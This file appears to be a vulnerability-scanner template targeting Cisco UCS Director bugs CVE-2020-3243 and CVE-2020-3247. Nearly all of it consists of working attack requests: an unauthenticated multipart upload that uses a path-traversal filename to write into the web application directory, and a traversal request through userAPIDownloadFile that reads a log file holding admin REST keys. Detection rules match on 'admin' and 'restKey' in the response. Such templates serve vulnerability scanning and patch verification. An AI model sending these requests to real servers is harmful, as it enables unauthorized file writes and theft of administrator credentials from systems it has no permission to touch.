id: cisco-ucs-rce-01
single: true
info:
  name: Cisco UCS RCE (CVE-2020-3243 & CVE-2020-3247)
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: POST
    redirect: false
    raw: |
      POST /cloupia/api/rest?opName=userAPI%3AuserAPIUnifiedImport&opData=%7B%7D HTTP/1.1
      Host: {{.Host}}
      Connection: close
      Accept-Encoding: gzip, deflate
      Accept: */*
      User-Agent: python-requests/2.23.0
      X-Cloupia-Request-Key: 
      Content-Length: 249
      Content-Type: multipart/form-data; boundary=fd4ecc92015f366ada7a4beefffe7505

      --fd4ecc92015f366ada7a4beefffe7505
      Content-Disposition: form-data; name="hax"; filename="../../../../opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports/si"
      Content-Type: text/x-spam

      whateva
      --fd4ecc92015f366ada7a4beefffe7505--

  # verify POC
  - method: GET
    redirect: false
    url: >-
     {{.root}}/cloupia/api/rest?opName=userAPI%3AuserAPIDownloadFile&opData=%7B%27param0%27%3A%20%27../../../../../../../../opt/infra/idaccessmgr/logfile.txt%27%7D
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - X-Cloupia-Request-Key: ' '
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "admin") && StringSearch("response", 'restKey')
      - >-
        StatusCode() == 200 && StringSearch("response", "File with size greater than") && StringSearch("response", 'userAPIDownloadFile')

reference:
  - link: https://srcincite.io/blog/2020/04/17/strike-three-symlinking-your-way-to-unauthenticated-access-against-cisco-ucs-director.html
  - verify: false